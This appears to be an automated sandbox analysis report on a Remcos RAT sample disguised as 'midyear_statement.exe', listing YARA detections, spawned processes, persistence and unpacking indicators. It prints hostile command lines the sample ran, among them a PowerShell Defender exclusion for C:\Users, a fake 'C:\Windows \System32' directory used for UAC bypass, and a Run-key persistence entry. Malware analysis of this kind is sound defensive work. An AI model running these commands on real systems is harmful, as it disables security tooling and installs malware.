                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@39/16@7/3
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 27_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 27_2_004182CE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_12347952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 24_2_12347952
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040A7F18 GetDiskFreeSpaceA, 0_2_040A7F18
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_1233F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 24_2_1233F474
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B6D0C CoCreateInstance, 0_2_040B6D0C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_1234B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, 24_2_1234B4A8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 24_2_1234AA4A
                      Source: C:\Users\user\Desktop\midyear_statement.exe | File created: C:\Users\Public\Libraries\Null
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cciqjdho.kwp.ps1
                      Source: C:\Windows \System32\2506803.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Command line argument: PG 24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Command line argument: 8SG 24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Command line argument: dMG 24_2_0059F7A7
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Command line argument: PSG 24_2_0059F7A7
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | System information queried: HandleInformation
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001C.00000002.1384508766.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: wkrriuhD.pif, 0000001B.00000002.1406746333.00000000028A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: midyear_statement.exe | ReversingLabs: Detection: 26%
                      Source: midyear_statement.exe | Virustotal: Detection: 31%
                      Source: C:\Users\user\Desktop\midyear_statement.exe | File read: C:\Users\user\Desktop\midyear_statement.exe
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Evasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknown | Process created: C:\Users\user\Desktop\midyear_statement.exe "C:\Users\user\Desktop\midyear_statement.exe"
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows \System32"
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows \System32\2506803.exe"
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"
                      Source: C:\Windows \System32\2506803.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"
                      Source: unknown | Process created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIF | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: unknown | Process created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIF | Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: midyear_statement.exe | Static file information: File size 1265664 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
                      Source: Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr

                      Data Obfuscation

                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Unpacked PE file: 27.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Unpacked PE file: 28.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Unpacked PE file: 29.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Unpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Unpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack
                      Source: Yara match | File source: 0.2.midyear_statement.exe.2656dc8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.midyear_statement.exe.2a46bd8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.midyear_statement.exe.40a0000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.midyear_statement.exe.2656dc8.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.midyear_statement.exe.2a46bd8.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1365940643.0000000002A46000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1364633992.0000000002656000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.1640507310.0000000004171000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.1569609862.00000000040F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: wkrriuhD.pif.0.dr | Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_040B7A50
                      Source: initial sample | Static PE information: section where entry point is pointing to: .....
                      Source: midyear_statement.exe | Static PE information: real checksum: 0x0 should be: 0x139d32
                      Source: netutils.dll.0.dr | Static PE information: real checksum: 0x22e25 should be: 0x1cc51
                      Source: wkrriuhD.pif.0.dr | Static PE information: real checksum: 0x0 should be: 0x1768a
                      Source: Dhuirrkw.PIF.23.dr | Static PE information: real checksum: 0x0 should be: 0x139d32
                      Source: 2506803.exe.0.dr | Static PE information: section name: .imrsiv
                      Source: netutils.dll.0.dr | Static PE information: section name: .....
                      Source: netutils.dll.0.dr | Static PE information: section name: ......
                      Source: netutils.dll.0.dr | Static PE information: section name: ....
                      Source: netutils.dll.0.dr | Static PE information: section name: ......
                      Source: netutils.dll.0.dr | Static PE information: section name: ....
                      Source: netutils.dll.0.dr | Static PE information: section name: ......
                      Source: netutils.dll.0.dr | Static PE information: section name: /4
                      Source: netutils.dll.0.dr | Static PE information: section name: /19
                      Source: netutils.dll.0.dr | Static PE information: section name: /31
                      Source: netutils.dll.0.dr | Static PE information: section name: /45
                      Source: netutils.dll.0.dr | Static PE information: section name: /57
                      Source: netutils.dll.0.dr | Static PE information: section name: /70
                      Source: netutils.dll.0.dr | Static PE information: section name: /81
                      Source: netutils.dll.0.dr | Static PE information: section name: /92
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040BD48C push ecx; mov dword ptr [esp], edx 0_2_040BD491
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040AC4B0 push ecx; mov dword ptr [esp], edx 0_2_040AC4B5
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040AD4E4 push 040AD510h; ret 0_2_040AD508
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040A66FA push 040A673Eh; ret 0_2_040A6736
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040A66FC push 040A673Eh; ret 0_2_040A6736
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040CB0AC push 040CB125h; ret 0_2_040CB11D
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040CB144 push 040CB1ECh; ret 0_2_040CB1E4
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040CB1F8 push 040CB288h; ret 0_2_040CB280
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040CA2A4 push 040CA4A4h; ret 0_2_040CA49C
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040A32C0 push eax; ret 0_2_040A32FC
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040CB2F4 push 040CB35Fh; ret 0_2_040CB357
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040A631E push 040A637Bh; ret 0_2_040A6373
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040A6320 push 040A637Bh; ret 0_2_040A6373
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040CC360 pushad ; ret 0_2_040CC365
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B7C48 push 040B7C80h; ret 0_2_040B7C78
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B7C46 push 040B7C80h; ret 0_2_040B7C78
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B5DC0 push ecx; mov dword ptr [esp], edx 0_2_040B5DC2
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B2EA4 push 040B2F1Ah; ret 0_2_040B2F12
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040CEF18 push eax; ret 0_2_040CEFE8
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B2FAF push 040B2FFDh; ret 0_2_040B2FF5
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B2FB0 push 040B2FFDh; ret 0_2_040B2FF5
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B7850 push 040B78CDh; ret 0_2_040B78C5
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B688A push 040B6937h; ret 0_2_040B692F
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B688C push 040B6937h; ret 0_2_040B692F
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040B9AF8 push 040B9B30h; ret 0_2_040B9B28
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040ACB2B push 040ACCB6h; ret 0_2_040ACCAE
                      Source: C:\Users\user\Desktop\midyear_statement.exe | Code function: 0_2_040ACB30 push 040ACCB6h; ret 0_2_040ACCAE
                      Source: C:\Windows \System32\2506803.exe | Code function: 16_2_613D0021 pushfq ; iretd 16_2_613D002A
                      Source: C:\Windows \System32\2506803.exe | Code function: 16_2_613D0D00 pushfq ; ret 16_2_613D0D01
                      Source: C:\Windows \System32\2506803.exe | Code function: 16_2_613D1DFE push rsp; iretd 16_2_613D1DFF
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif | Code function: 24_2_00402DB4 push eax; ret 24_2_00402E84

                      Persistence and Installation Behavior

                      Source: C:\Windows\SysWOW64\extrac32.exe File created: C:\Users\Public\Libraries\Dhuirrkw.PIF
                      Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Users\Public\Libraries\wkrriuhD.pif
                      Source: C:\Windows\SysWOW64\cmd.exe Executable created and started: C:\Windows \System32\2506803.exe
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12336EB0 ShellExecuteW,URLDownloadToFileW,24_2_12336EB0
                      Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Windows \System32\2506803.exe
                      Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Windows \System32\netutils.dll
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,24_2_1234AA4A
                      Source: C:\Users\user\Desktop\midyear_statement.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dhuirrkw
                      Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B9B34 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_040B9B34
                      Source: C:\Users\user\Desktop\midyear_statement.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
